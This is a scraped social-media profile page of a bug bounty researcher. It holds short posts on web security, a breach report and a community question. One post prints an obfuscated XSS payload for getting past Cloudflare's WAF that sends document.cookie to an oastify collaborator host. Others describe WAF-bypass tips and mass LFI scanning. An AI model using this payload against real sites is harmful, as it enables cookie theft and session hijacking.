
N$
@nav1n0x
Followers
27K
Following
6K
Media
633
Statuses
3K
Github: https://t.co/7MrKOcUFfO
Amsterdam, The Netherlands
Joined December 2010
This payload bypasses Cloudflare waf in certain cases: "top[8680439. toString(30)](document.domain)" or "top[8680439. toString(30)](new%20Image().src%3D%27
https://xxx.oastify.com/log?cookie%3D%27%2Bdocument.cookie)"
#BugBounty
7
66
456
ππ.
Kerala, the destination you'll never want to leave. Thank you, The Fauxy. #F35 #Trivandrum #KeralaTourism
1
0
3
A hacker claims to have breached an Indian nuclear and chemical company and is selling over 80 databases containing employee details, locations, critical infrastructure information, and more in the darkweb market place. @IndianCERT @Cyberdost @NCIIPC @AskAnshul.
1
0
22
This is a great tip for bypassing Cloudflare for SQLi/XSS etc. I recently tweeted something similar, where I managed to bypass a Cloudflare 403 bycombining multiple payloads, hope this helps π
How to bypass Cloudflare WAF?.@FearsOff #bugbountytips #cloudflare #waf #bypass. 1. Found an SQL injection but getting blocked by Cloudflare?.Here's a pro tip π
2
35
212
Whatβs most valuable from a community member?.Choose honestly β what really earns your respect in the infosec community? . Iβm asking because Iβve noticed a steep decline in knowledge sharing lately. Many seniors have stopped posting . Why do you think that is? #BugBounty.
6
5
19
Simple LFI using my path traversal script on GitHub. Used @0xAsm0d3usβs ParamSpider to gather URLs, filtered for relevant parameters, slightly modified the script to inject payloads into parameters like ?path and ?file, & ran the script β got 1 hit out of 20k+ URLs. The target is
9
46
409